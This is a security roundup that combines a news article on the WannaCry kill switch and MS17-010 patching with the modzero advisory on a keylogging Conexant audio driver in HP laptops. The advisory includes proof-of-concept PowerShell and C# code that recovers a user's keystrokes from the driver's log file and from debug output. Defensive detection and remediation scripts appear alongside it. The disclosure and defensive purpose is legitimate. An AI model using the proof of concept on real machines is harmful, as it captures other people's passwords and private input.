Stop WannaCry Ransomware from infecting.


If you are following the news, by now you might be aware that a security researcher has activated a “Kill Switch” which apparently stopped the WannaCry ransomware from spreading further.

But that is not quite true, and the threat is not over yet.

The kill switch has only slowed the infection rate.

Updated: Multiple security researchers have reported further WannaCry samples with different kill-switch domains, and some with no kill-switch function at all, continuing to infect unpatched computers worldwide.

So far, over 237,000 computers across 99 countries have been infected, and the count is still rising hours after the kill switch was triggered by the 22-year-old British security researcher behind the Twitter handle ‘MalwareTech.’

For those unaware, WannaCry is fast-spreading ransomware that uses a Windows SMB exploit to remotely compromise computers running unpatched or unsupported versions of Windows.

Once a machine is infected, WannaCry scans for other vulnerable computers on the same network, as well as random hosts on the wider Internet, in order to spread quickly.

The SMB exploit currently used by WannaCry has been identified as EternalBlue, one of a collection of hacking tools allegedly created by the NSA and subsequently dumped by a hacking group calling itself “The Shadow Brokers” over a month ago.

“If NSA had privately disclosed the flaw used to attack hospitals when they *found* it, not when they lost it, this may not have happened,” NSA whistleblower Edward Snowden says.

Kill-Switch for WannaCry? No, It’s not over yet!


In our previous two articles, we have put together more information about this massive ransomware campaign, explaining how MalwareTech accidentally halted the global spread of WannaCry by registering a domain name hidden in the malware.

hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

This domain controls whether WannaCry propagates like a worm: as explained previously, the SMB worm tries to connect to it when it starts, and only if the connection fails does it proceed to infect the system and scan for further targets; if the domain answers, the worm exits.

Fortunately, MalwareTech registered the domain and turned it into a sinkhole, a tactic researchers use to redirect traffic from infected machines to a system they control (read his latest blog post for more details).

Updated: Matthieu Suiche, a security researcher, has confirmed that he found a new WannaCry variant with a different kill-switch domain, which he registered and pointed at a sinkhole in an effort to slow down infections.

hxxp://ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com/

The newly discovered WannaCry variant works exactly like the previous variant that wreaked havoc across the world Friday night.

But, if you are thinking that activating the kill switch has completely stopped the infection, then you are mistaken.

The kill switch lives in the SMB worm component, not in the ransomware module itself. “WannaCrypt ransomware was spread normally long before this and will be long after; what we stopped was the SMB worm variant,” MalwareTech told The Hacker News.

The kill switch does not protect an unpatched PC in the following scenarios:

  • If WannaCry arrives via email, a malicious torrent or another vector rather than over SMB; the kill switch only governs the worm component.
  • If your ISP, antivirus or firewall happens to block access to the sinkhole domain: the connection fails, and the worm proceeds.
  • If the targeted system needs a proxy to reach the Internet, as most corporate networks do; the worm's check connects directly and does not use the system proxy, so it fails.
  • If someone makes the sinkhole domain unreachable for everyone, for example with a large-scale DDoS attack.

MalwareTech also confirmed to THN that some “Mirai botnet skids tried to DDoS the [sinkhole] server for lulz,” in order to make it unavailable to the WannaCry SMB worm, which proceeds to infect when the connection fails. But “it failed hardcore,” at least for now.
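Two things follow from the scenarios above that a defender can check: which hosts on the network reached for a kill-switch domain (any such host executed the worm, whatever happened next), and whether the worm's check would even succeed from the network, since a failed check is exactly what lets the worm continue. The PowerShell below is an added example, not code from the article or from MalwareTech; the log excerpt and its field layout are constructed, and Test-KillSwitchReachable needs Internet access, which is why the call is left commented out.

```powershell
# Added example (not part of the original article): find hosts in your own
# logs that contacted the WannaCry kill-switch domains, and test whether the
# worm's check would succeed from this network. Log lines below are constructed.
$KillSwitchDomains = @(
    'www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com',   # original sample
    'ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com'        # variant found by Suiche
)

# Constructed DNS/firewall log excerpt. Assumed layout: timestamp, client IP,
# event, (port,) name, result. Adjust the regexes to your own log format.
$SampleLog = @'
2017-05-12 14:02:11 10.0.3.17 query www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com NOERROR
2017-05-12 14:02:12 10.0.3.17 connect 80 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com DENY
2017-05-12 14:05:40 10.0.7.201 query ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com NOERROR
2017-05-12 14:05:41 10.0.7.201 connect 80 ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com ALLOW
2017-05-12 14:09:03 10.0.3.18 query www.example.com NOERROR
'@

function Find-KillSwitchLookups {
    param([string[]]$Lines, [string[]]$Domains = $KillSwitchDomains)
    $pattern = ($Domains | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $hits = @{}
    foreach ($line in $Lines) {
        if ($line -notmatch $pattern) { continue }
        # The first dotted quad on the line is taken as the client/source address.
        if ($line -match '\b(\d{1,3}(?:\.\d{1,3}){3})\b') {
            $ip = $Matches[1]
            if (-not $hits.ContainsKey($ip)) {
                $hits[$ip] = [ordered]@{ Host = $ip; Events = 0; CheckBlocked = $false }
            }
            $hits[$ip]['Events'] += 1
            # A blocked lookup or connection means the worm's check failed on
            # that host, i.e. it went on to encrypt and to scan for SMB targets.
            if ($line -match '\b(DENY|BLOCK|REFUSED|NXDOMAIN)\b') { $hits[$ip]['CheckBlocked'] = $true }
        }
    }
    $hits.Values | ForEach-Object { [pscustomobject]$_ }
}

function Test-KillSwitchReachable {
    # Direct TCP connect with no proxy, which is how the worm's check behaves:
    # a host that needs a proxy for outbound port 80 fails here even though
    # browsers on it work, and that failure is what lets the worm run.
    foreach ($d in $KillSwitchDomains) {
        $r = Test-NetConnection -ComputerName $d -Port 80 -WarningAction SilentlyContinue
        [pscustomobject]@{ Domain = $d; DirectTcp80 = $r.TcpTestSucceeded }
    }
}

# Every host listed here ran the worm; those with CheckBlocked = True are the
# ones on which the kill switch did not help and which need isolation first.
Find-KillSwitchLookups -Lines ($SampleLog -split "`r?`n") | Format-Table -AutoSize
# Test-KillSwitchReachable | Format-Table   # needs Internet access; run on a representative host
```

Do not add these domains to an internal block list: as the second scenario above says, blocking the sinkhole is precisely what turns the check into a failure and releases the worm. Allow the lookups, log them, and treat each source host as compromised.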

WannaCry 2.0, Ransomware With *NO* Kill-Switch Is On Hunt!


Initially, this part of the story was based on the research of a security researcher who earlier claimed to have samples of a new WannaCry variant with no kill-switch function. For some reason he backed off, so we have removed his references from this story for now.

However, shortly afterwards Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab, confirmed to us that his team had seen further WannaCry samples on Friday that did not have the kill switch.

“I can confirm we’ve had versions without the kill switch domain connect since yesterday,” Raiu told The Hacker News.

Updated: WannaCry 2.0 is Someone Else’s Work

Raiu shared some of the samples his team discovered with Suiche, who analysed them and confirmed that there is a WannaCrypt variant with no kill switch, equipped with the SMB exploit, that could spread rapidly without disruption.

Worse, the new variant without a kill switch is believed to have been created by someone else, not the attackers behind the initial WannaCry ransomware.

“The patched version Matt described does attempt to spread. It’s a full set which was modified by someone with a hex editor to disable the kill switch,” Raiu told me.

Updated: Suiche also confirmed that the modified variant with no kill switch is corrupted, but that does not mean other attackers will not produce a working one.

“Given the high profile of the original attack, it’s going to be no surprise at all to see copycat attacks from others, and perhaps other attempts to infect even more computers from the original WannaCry gang. The message is simple: Patch your computers, harden your defences, run a decent anti-virus, and – for goodness sake – ensure that you have secure backups.” Cyber security expert Graham Cluley told The Hacker News.

Expect a new wave of ransomware attacks, from the original attackers and from new ones, that will be difficult to stop unless and until all vulnerable systems are patched.

“The next attacks are inevitable, you can simply patch the existing samples with a hex editor and it’ll continue to spread,” Matthew Hickey, a security expert and co-founder of Hacker House told me.

“We will see a number of variants of this attack over the coming weeks and months so it’s important to patch hosts. The worm can be modified to spread other payloads not just WCry and we may see other malware campaigns piggybacking off this sample's success.”

Even after WannaCry attacks made headlines all over the Internet and Media, there are still hundreds of thousands of unpatched systems out there that are open to the Internet and vulnerable to hacking.

“The worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host,” Microsoft says.

A new strain of WannaCry would not need long to take over another hundred thousand vulnerable systems.

Apply the Windows security update for MS17-010 to stop this ransomware from infecting you or your organization:

https://www.catalog.update.microsoft.com/Search.aspx?q=kb4012598

KB4012598 is the MS17-010 package for the older platforms (Windows XP, Server 2003, Vista, Server 2008 and Windows 8); Windows 7, 8.1, 10 and the newer servers receive the same fix under other KB numbers, so search the catalog for your version. Download the update for your system and apply it. Where you cannot patch immediately, disable the SMBv1 protocol, turn off file and printer sharing on systems that do not need it, and block TCP port 445 from the Internet at the perimeter.
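The steps above, as an added example in PowerShell (not from the article or from Microsoft): report whether an MS17-010 update is recorded on the host, show the SMBv1 state in the three places it lives depending on the Windows version, and offer the interim hardening. The KB list is an assumption drawn from the MS17-010 bulletin and should be verified against it; KB2696547 is Microsoft's documented registry method for Windows 7 and Server 2008 R2.

```powershell
# Added example, not part of the original article: check a Windows host for the
# MS17-010 fix that closes the SMB flaw WannaCry exploits, report its SMBv1
# state, and optionally turn SMBv1 off. Run from an elevated PowerShell prompt.
# The KB list is an assumption taken from the MS17-010 bulletin (numbers differ
# per OS version; KB4012598 from the article is the XP/2003/Vista/2008/8/2012
# package). Verify it against the bulletin before relying on it.
$Ms17010Kbs = @(
    'KB4012598',                                  # XP, Server 2003, Vista, Server 2008, Windows 8
    'KB4012212', 'KB4012215',                     # Windows 7 / Server 2008 R2 (security-only / rollup)
    'KB4012213', 'KB4012216',                     # Windows 8.1 / Server 2012 R2
    'KB4012214', 'KB4012217',                     # Server 2012
    'KB4012606', 'KB4013198', 'KB4013429'         # Windows 10 1507 / 1511 / 1607
)
$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Ms17010Patched {
    # Get-HotFix lists updates the servicing stack recorded. On Windows 10 a
    # later cumulative update supersedes these KBs, so 'not found' there means
    # 'check the OS build', not 'exposed'.
    $found = @(Get-HotFix | Where-Object { $Ms17010Kbs -contains $_.HotFixID } |
               ForEach-Object { $_.HotFixID })
    [pscustomobject]@{ Patched = ($found.Count -gt 0); HotFixIDs = $found }
}

function Get-Smb1State {
    # Three views, because the SMBv1 switch lives in different places per OS version.
    $srv = $null; $feat = $null
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {      # Windows 8 / 2012 and later
        $srv = Get-SmbServerConfiguration
    }
    if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {      # Windows 10 / 2016
        $feat = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    }
    $reg = Get-ItemProperty -Path $LanmanParams -Name SMB1 -ErrorAction SilentlyContinue   # Windows 7 / 2008 R2
    $srvState  = if ($srv)  { $srv.EnableSMB1Protocol } else { 'n/a' }
    $featState = if ($feat) { [string]$feat.State }     else { 'n/a' }
    $regState  = if ($reg)  { $reg.SMB1 }               else { 'not set (SMBv1 enabled by default)' }
    [pscustomobject]@{ ServerEnableSMB1 = $srvState; OptionalFeature = $featState; RegistrySMB1 = $regState }
}

function Disable-Smb1 {
    # Interim hardening for hosts that cannot be patched right away.
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    }
    if (Get-Command Disable-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
    }
    # Registry method Microsoft documents for Windows 7 / Server 2008 R2 (KB2696547).
    Set-ItemProperty -Path $LanmanParams -Name SMB1 -Type DWORD -Value 0 -Force
    Write-Warning 'SMBv1 disabled; reboot to complete. Devices that only speak SMBv1 (old NAS boxes, printers) will lose access.'
}

$patch = Test-Ms17010Patched
$patch | Format-List
Get-Smb1State | Format-List
if (-not $patch.Patched) {
    Write-Warning 'No MS17-010 update recorded: install it now; until then run Disable-Smb1 and block TCP 445 at the perimeter.'
    # Disable-Smb1   # uncomment to apply the interim hardening
}
```

Disabling SMBv1 is a mitigation, not a substitute for the patch: the EternalBlue exploit targets SMBv1, so removing the protocol closes that door, but the vulnerable code remains on disk until MS17-010 is installed.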

Several HP laptops have a keylogger in the audio driver.

--------------------------------------------------------------- v3 -
modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]
---------------------------------------------------------------------

---------------------------------------------------------------------
1. Timeline
---------------------------------------------------------------------

* 2017-04-28: Vulnerability has been discovered in MicTray64 version
1.0.0.31 / Thu Dec 24 08:35:35 2015
* 2017-04-28: Vendor Conexant contacted (Email)
* 2017-04-29: Higher impact has been discovered in most recent
MicTray64 version 1.0.0.46 / Tue Oct 11 10:56:13 2016
* 2017-04-30: CVE-2017-8360 has been assigned to this vulnerability.
* 2017-05-01: Contacted Hewlett-Packard Enterprise security advisor
with detailed description of the problem.
* 2017-05-02: Contacted vendor Conexant via Twitter
* 2017-05-05: Sent technical information to HPE security contact.
Informed HPE about releasing the advisory on Monday 8th
of May in case we don’t get any feedback on our report.
* 2017-05-05: Received some notes from HPE after sending technical
information. They tried to reach for security folks
at HP Inc. to gain attention.
* 2017-05-11: Release of the advisory

---------------------------------------------------------------------
2. Summary
---------------------------------------------------------------------

Vendor: Conexant Systems, Inc.

Software packages known to be affected:

* Recent and previous (Q2/2017) HP Audiodriver Packages /
Conexant High-Definition (HD) Audio Driver
Version 10.0.931.89 REV: Q PASS: 5
(ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.html)
* Probably other hardware vendors, shipping Conexant hardware and
drivers

Systems known to be affected:

According to HP information in sp79420.html, the following systems
are affected:

* HARDWARE PRODUCT MODEL(S):
HP EliteBook 820 G3 Notebook PC
HP EliteBook 828 G3 Notebook PC
HP EliteBook 840 G3 Notebook PC
HP EliteBook 848 G3 Notebook PC
HP EliteBook 850 G3 Notebook PC
HP ProBook 640 G2 Notebook PC
HP ProBook 650 G2 Notebook PC
HP ProBook 645 G2 Notebook PC
HP ProBook 655 G2 Notebook PC
HP ProBook 450 G3 Notebook PC
HP ProBook 430 G3 Notebook PC
HP ProBook 440 G3 Notebook PC
HP ProBook 446 G3 Notebook PC
HP ProBook 470 G3 Notebook PC
HP ProBook 455 G3 Notebook PC
HP EliteBook 725 G3 Notebook PC
HP EliteBook 745 G3 Notebook PC
HP EliteBook 755 G3 Notebook PC
HP EliteBook 1030 G1 Notebook PC
HP ZBook 15u G3 Mobile Workstation
HP Elite x2 1012 G1 Tablet
HP Elite x2 1012 G1 with Travel Keyboard
HP Elite x2 1012 G1 Advanced Keyboard
HP EliteBook Folio 1040 G3 Notebook PC
HP ZBook 17 G3 Mobile Workstation
HP ZBook 15 G3 Mobile Workstation
HP ZBook Studio G3 Mobile Workstation
HP EliteBook Folio G1 Notebook PC
* OPERATING SYSTEM(S):
Microsoft Windows 10 32
Microsoft Windows 10 64
Microsoft Windows 10 IOT Enterprise 32-Bit (x86)
Microsoft Windows 10 IOT Enterprise 64-Bit (x86)
Microsoft Windows 7 Enterprise 32 Edition
Microsoft Windows 7 Enterprise 64 Edition
Microsoft Windows 7 Home Basic 32 Edition
Microsoft Windows 7 Home Basic 64 Edition
Microsoft Windows 7 Home Premium 32 Edition
Microsoft Windows 7 Home Premium 64 Edition
Microsoft Windows 7 Professional 32 Edition
Microsoft Windows 7 Professional 64 Edition
Microsoft Windows 7 Starter 32 Edition
Microsoft Windows 7 Ultimate 32 Edition
Microsoft Windows 7 Ultimate 64 Edition
Microsoft Windows Embedded Standard 7 32
Microsoft Windows Embedded Standard 7E 32-Bit

CVE-ID: CVE-2017-8360
Severity: High/Medium
Type: Covert Storage Channel
Vendor: Conexant Systems, Inc.
Product: mic tray icon
Version: <= 1.0.0.46
Attack type: Local
Affected Components: Scheduled Task c:\windows\system32\mictray64.exe

---------------------------------------------------------------------
3. Details
---------------------------------------------------------------------

Conexant's MicTray64.exe is installed with the Conexant audio driver
package and registered as a Microsoft Scheduled Task to run after each
user login. The program monitors all keystrokes made by the user to
capture and react to functions such as microphone mute/unmute
keys/hotkeys. Monitoring of keystrokes is added by implementing a
low-level keyboard input hook [1] function that is installed by calling
SetWindowsHookEx().

In addition to the handling of hotkey/function key strokes, all
key-scancode information [2] is written into a logfile in a world-readable
path (C:\Users\Public\MicTray.log). If the logfile does not exist or
the setting is not yet available in the Windows registry, all keystrokes
are passed to the OutputDebugString API, which enables any process in
the current user context to capture keystrokes without exposing
malicious behavior. Any framework and process with access to the
MapViewOfFile API should be able to silently capture sensitive data by
capturing the user's keystrokes. In version 1.0.0.31, only
OutputDebugString was used to forward key scancodes and nothing was
written to files. The following pseudocode shows the registration of
the keylogging function handler of MicTray64.exe version 1.0.0.46:

int64 keylogger_enable(bool activate)
{
    [...]
    if ( !keylogger_active )
    {
        [...]
        // 13=WH_KEYBOARD_LL: Installs a hook procedure that
        // monitors low-level keyboard input events. For
        // more information, see the LowLevelKeyboardProc
        // hook procedure.
        hKeyloggerHook = SetWindowsHookExW(
                             13, (HOOKPROC)handle_scancode,
                             hSelf,
                             0);

        if ( hKeyloggerHook )
        {
            keylogger_active = 1;
            return 0;
        }
        [...]
    }
}

After registering function handle_scancode() as a handler to
any keystroke made by the user, the following pseudo-code is executed
every time a key is pressed or released:

LRESULT handle_scancode(
    int _in_nCode,
    WPARAM _in_wParam,
    tagKBDLLHOOKSTRUCT *_in_lParam_keystroke)
{
    tagKBDLLHOOKSTRUCT *key_stroke;
    WPARAM wParam;
    int nCode;
    int64 target;
    DWORD is_keyfoo;
    int is_keydown;
    char tmp;
    int64 key_flags;
    int64 key_vk;

    key_stroke = _in_lParam_keystroke;
    wParam = _in_wParam;
    nCode = _in_nCode;

    if ( _in_nCode >= 0 )
    {
        target = (cfg_HotKeyMicScancode >> 8 *
                  (cfg_HotKeyMicScancode_len - cfg_HotKeyMicScancode_len2));
        LODWORD(key_vk) = _in_lParam_keystroke->vkCode;
        LODWORD(key_flags) = _in_lParam_keystroke->flags;
        is_keyfoo = _in_lParam_keystroke->flags & 1;
        // bit 7 of flags (LLKHF_UP) is set on key release
        is_keydown = ~(key_flags >> 7) & 1;

[*]     send_to_dbglog(
            0x1D,
            L"Mic target 0x%x scancode 0x%x flags 0x%x extra 0x%x vk 0x%x\n",
            target,
            _in_lParam_keystroke->scanCode,
            key_flags,
            _in_lParam_keystroke->dwExtraInfo,
            key_vk);

        conexant_handle_fn_keys(
            cfg_MicMuteScancodeSettings,
            is_keydown,
            key_stroke->scanCode,
            target,
            &cfg_HotKeyMicScancode_len,
            &cfg_HotKeyMicScancode_len2,
            1);

        if ( cfg_MicMuteScancodeSettings & 4 )
            conexant_handle_fn_keys(
                cfg_MicMuteScancodeSettings,
                is_keydown,
                key_stroke->scanCode,
                (cfg_HotKeyMicScancode2 >> 8 *
                 (cfg_HotKeyMicScancode2_len - cfg_HotKeyMicScancode2_len2)),
                &cfg_HotKeyMicScancode2_len,
                &cfg_HotKeyMicScancode2_len2,
                1);

        tmp = cfg_SpkMuteScancodeSettings;

        if ( cfg_SpkMuteScancodeSettings & 8 && is_keyfoo
             || !(cfg_SpkMuteScancodeSettings & 8) )
        {
            conexant_handle_fn_keys(
                cfg_SpkMuteScancodeSettings,
                is_keydown,
                key_stroke->scanCode,
                (cfg_HotKeySpkScancode >> 8 *
                 (cfg_HotKeySpkScancode_len - cfg_HotKeySpkScancode_len2)),
                &dword_1402709C8,
                &dword_1402709CC,
                0);
            tmp = cfg_SpkMuteScancodeSettings;
        }

        if ( tmp & 4 && (tmp & 8 && is_keyfoo || !(tmp & 8)) )
            conexant_handle_fn_keys(
                tmp,
                is_keydown,
                key_stroke->scanCode,
                (cfg_HotKeySpkScancode2 >> 8 *
                 (cfg_HotKeySpkScancode2_len - cfg_HotKeySpkScancode2_len2)),
                &cfg_HotKeySpkScancode2_len,
                &cfg_HotKeySpkScancode2_len2,
                0);
    }
    return CallNextHookEx(hhk, nCode, wParam, key_stroke);
}

The function called at [*] writes every keystroke to a file or
broadcasts it via Microsoft's Debug Monitor APIs, through store_keystroke():

void store_keystroke(LPCVOID lpBuffer)
{
    WORD *scancode_logline;
    int64 str_len;
    DWORD NumberOfBytesWritten;
    int str_newline;

    scancode_logline = lpBuffer;
    if ( g_write_to_logfile )
    {
        SetFilePointer(g_hFile, 0, 0, 2);     // 2 = FILE_END: append to the log
        str_len = -1;

        // wcslen(): count UTF-16 code units up to the terminator
        while ( scancode_logline[str_len++ + 1] != 0 )
            ;

        WriteFile(
            g_hFile,
            scancode_logline,
            2 * str_len,
            &NumberOfBytesWritten,
            0);

        str_newline = '\n\0\r';
        WriteFile(g_hFile, &str_newline, 4, &NumberOfBytesWritten, 0);
    }
    else
    {
        OutputDebugStringW(lpBuffer);
    }
}

This issue leads to a high risk of leaking sensitive user input to any
person or process that is able to read files in
C:\Users\Public\MicTray.log or call MapViewOfFile(). Investigators
with access to the unencrypted file-system might be able to recover
sensitive data of historic key-logs as well. Users are not aware that
every keystroke made while entering sensitive information – such as
passphrases, passwords on local or remote systems – are captured by
Conexant and exposed to any process and framework with access to the
file-system or MapViewOfFile API.
Additionally, this information-leak via Covert Storage Channel
enables malware authors to capture keystrokes without taking the risk
of being classified as malicious task by AV heuristics.

It is not recommended to provide information on keystrokes to
arbitrary processes by writing keystrokes to disk or by using
OutputDebugStringW() for debugging purposes.

---------------------------------------------------------------------
4. Impact
---------------------------------------------------------------------

Any process that is running in the current user-session and therefore
able to monitor debug messages, can capture keystrokes made by the
user. Processes are thus able to record sensitive data such as
passwords, without performing suspicious activities that may trigger
AV vendor heuristics. Furthermore, any process running on the system
by any user is able to access all keystrokes made by the user via
file-system access. It is not known, if log-data is submitted to
Conexant at any time or why all key presses are logged anyway.

---------------------------------------------------------------------
5. Proof of concept exploit
---------------------------------------------------------------------

A proof-of-concept can be implemented by using PowerShell to
parse MicTray.log:

$filename = "c:\users\public\MicTray.log"

# MicTray keeps the log open for writing, so open it shared
[System.IO.FileStream] $fs = [System.IO.File]::Open(
    $filename,
    [System.IO.FileMode]::Open,
    [System.IO.FileAccess]::Read,
    [System.IO.FileShare]::ReadWrite)

# store_keystroke() writes 2 * str_len bytes, i.e. UTF-16LE
[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(
    $fs,
    [System.Text.Encoding]::Unicode)

$el = 0

while ($el -lt 2) {

    $line = $fr.ReadLine()

    # handle broken newlines in log: the '\n\0\r' terminator yields empty
    # lines, so only two consecutive empty reads (or EOF, which returns
    # $null) end the loop
    if ([string]::IsNullOrEmpty($line)) {
        $el++
        continue
    }
    $el = 0

    $mc = [regex]::Match($line,
        "MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$")
    $r = $mc.Groups[2].Value

    if (-Not [string]::IsNullOrEmpty($r)) {
        $i = [convert]::ToInt32($r, 16)
        $c = [convert]::ToChar($i)

        # print the virtual-key code as a character when it is printable ASCII
        if ($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }

        write-host -NoNewLine $("{0}" -f $c)
    }
}

However, if no logfile is written, it is also possible to obtain
keystrokes by just following Microsoft’s DbMon Debug Monitor [3]
approach of capturing strings passed to OutputDebugString [4]:

using System;

// DebugMonitor and OnOutputDebugStringHandler are not defined here: they come
// from a .NET port of the DbMon debug-monitor sample [3], which reads the
// DBWIN_BUFFER shared section that OutputDebugString writes into.
namespace mod0_dbgview
{
    class Program
    {
        public static void Main(string[] args)
        {
            DebugMonitor.Start();
            DebugMonitor.OnOutputDebugString += new
                OnOutputDebugStringHandler(OnOutputDebugString);
            Console.WriteLine("Press 'Enter' to exit.");
            Console.ReadLine();
            DebugMonitor.Stop();
        }

        // version 1.0.0.46: the debug line carries a prefix, so "Mic" is
        // token 7, the flags value token 13 and the vk value token 17
        private static void OnOutputDebugString(int pid, string text)
        {
            char sep = ' ';
            char nl = '\n';
            text = text.TrimEnd(nl);
            string[] items = text.Split(sep);
            // other processes also emit debug strings; skip anything too short
            if (items.Length > 17 && items[7].Equals("Mic"))
            {
                int c_int = Convert.ToInt32(items[17], 16);
                if (c_int == 0xd)                        // VK_RETURN
                {
                    Console.WriteLine();
                }
                else if (Convert.ToInt32(items[13], 16) == 0x00)   // flags 0: key down
                    Console.Write("{0}", (char)(c_int & 0xff));
            }
        }

        // version 1.0.0.31: no prefix, "Mic target 0x.. scancode 0x.. flags 0x.. extra 0x.. vk 0x.."
        private static void OnOutputDebugString_v31(
            int pid,
            string text)
        {
            char sep = ' ';
            string[] items = text.Split(sep);
            if (items.Length > 10 && items[0].Equals("Mic"))
            {
                int c_int = Convert.ToInt32(items[10], 16);
                if (c_int == 0xd)
                {
                    Console.WriteLine();
                }
                else if (Convert.ToInt32(items[6], 16) == 0x00)
                    Console.Write("{0}", (char)(c_int & 0xff));
            }
        }
    }
}

Any framework that provides an API down to ReadFile() or Microsoft’s
MapViewOfFile() should be able to capture keystrokes captured by
Conexant’s audio driver utils. By using Microsoft Windows Sysinternals
Dbgview [5], keystrokes can be visualized easily, if they are not
written to file.

---------------------------------------------------------------------
6. Workaround
---------------------------------------------------------------------

Delete MicTray executables and logfiles. Deleting the Scheduled
Task is not sufficient, as Conexant’s Windows Service CxMonSvc will
launch MicTray otherwise. The executable is located at
c:\Windows\System32\MicTray64.exe, the MicTray logfile is located at
C:\Users\Public\MicTray.log
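The workaround above, as an added PowerShell example that is not part of the modzero advisory: it audits a host for the MicTray binary (hashing it against the advisory's SHA-256 sums), the CxMonSvc service, any scheduled task that launches MicTray and the world-readable log, and with -Remediate removes the binary and the log after stopping the service that would otherwise relaunch it. The file paths, service name and hashes come from the advisory; the overwrite-before-delete step is this example's own addition.

```powershell
# Added example, not part of the modzero advisory: audit a host for the
# MicTray keylogger and, with -Remediate, apply the advisory's workaround.
# Run from an elevated PowerShell prompt. Paths, the CxMonSvc service name
# and the SHA-256 sums (MicTray64_v31.exe / MicTray64_v46.exe) are the
# advisory's; the overwrite step before deletion is this example's addition.
param([switch]$Remediate)

$KnownHashes = @{
    '127163C863B320814B6F420390DB9D5CE48E9158BDB62AA94E953D85EC1E7A89' = 'MicTray64.exe 1.0.0.31'
    'C046C7F364B42388BB392874129DA555D9C688DCED3AC1D6A1C6B01DF29EA7A8' = 'MicTray64.exe 1.0.0.46'
}
$Executable = "$env:SystemRoot\System32\MicTray64.exe"
$LogFile    = "$env:SystemDrive\Users\Public\MicTray.log"

function Get-MicTrayStatus {
    $exeInfo = $null
    if (Test-Path $Executable) {
        $hash  = (Get-FileHash -Path $Executable -Algorithm SHA256).Hash
        $known = if ($KnownHashes.ContainsKey($hash)) { $KnownHashes[$hash] } else { 'build not in advisory' }
        $exeInfo = [pscustomobject]@{
            Path    = $Executable
            Version = (Get-Item $Executable).VersionInfo.FileVersion
            Sha256  = $hash
            Known   = $known
        }
    }
    $logInfo = $null
    if (Test-Path $LogFile) {
        $item = Get-Item $LogFile
        $logInfo = [pscustomobject]@{
            Path   = $item.FullName
            Bytes  = $item.Length
            Access = (Get-Acl $LogFile).AccessToString   # shows who can read the keystrokes
        }
    }
    [pscustomobject]@{
        Executable    = $exeInfo
        Running       = [bool](Get-Process -Name MicTray64 -ErrorAction SilentlyContinue)
        CxMonSvc      = (Get-Service -Name CxMonSvc -ErrorAction SilentlyContinue).Status
        ScheduledTask = @(Get-ScheduledTask -ErrorAction SilentlyContinue |
                          Where-Object { $_.Actions.Execute -match 'MicTray' } |
                          ForEach-Object { $_.TaskName })
        Log           = $logInfo
    }
}

function Invoke-MicTrayWorkaround {
    # Removing the scheduled task alone is not enough (CxMonSvc relaunches
    # MicTray), so stop the service and the process before deleting the binary.
    if (Get-Service -Name CxMonSvc -ErrorAction SilentlyContinue) {
        Stop-Service -Name CxMonSvc -Force -ErrorAction SilentlyContinue
    }
    Get-Process -Name MicTray64 -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { $_.Actions.Execute -match 'MicTray' } |
        Unregister-ScheduledTask -Confirm:$false
    if (Test-Path $Executable) {
        # If this is denied the file is owned by TrustedInstaller: take ownership
        # first (takeown /f <path>; icacls <path> /grant Administrators:F).
        Remove-Item -Path $Executable -Force
    }
    if (Test-Path $LogFile) {
        # Best-effort overwrite before deletion: the advisory notes that old
        # key logs can be recovered from the file system, and plain deletion
        # leaves the keystrokes on disk. This does not defeat SSD wear
        # levelling or volume shadow copies, so treat logged secrets as exposed.
        $len = (Get-Item $LogFile).Length
        [System.IO.File]::WriteAllBytes($LogFile, (New-Object byte[] $len))
        Remove-Item -Path $LogFile -Force
    }
}

$status = Get-MicTrayStatus
$status | Format-List
if ($Remediate -and ($status.Executable -or $status.Log)) {
    Invoke-MicTrayWorkaround
    Get-MicTrayStatus | Format-List
}
```

Removing MicTray64.exe also removes the on-screen microphone mute indicator it provides; audio itself is unaffected. Because the keystrokes were already exposed to every local process (and, through the log, to every local user), rotate any passwords typed on the machine after the driver package was installed.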

---------------------------------------------------------------------
7. Fix
---------------------------------------------------------------------

It is not known to modzero, if a security fix is available.

---------------------------------------------------------------------
8. References
---------------------------------------------------------------------

[1] “LowLevelKeyboardProc callback function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx
[2] KBDLLHOOKSTRUCT structure –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644967(v=vs.85).aspx
[3] “DbMon: Implements a Debug Monitor” –
https://msdn.microsoft.com/en-us/library/aa242171(v=vs.60).aspx
[4] “MSDN/OutputDebugString function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
[5] “Microsoft Windows Sysinternals DebugView”
https://technet.microsoft.com/en-us/sysinternals/debugview.aspx
[6] “modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]” –
https://www.modzero.ch/advisories/MZ-17-01-Conexant-Keylogger.txt

SHA256 sums:
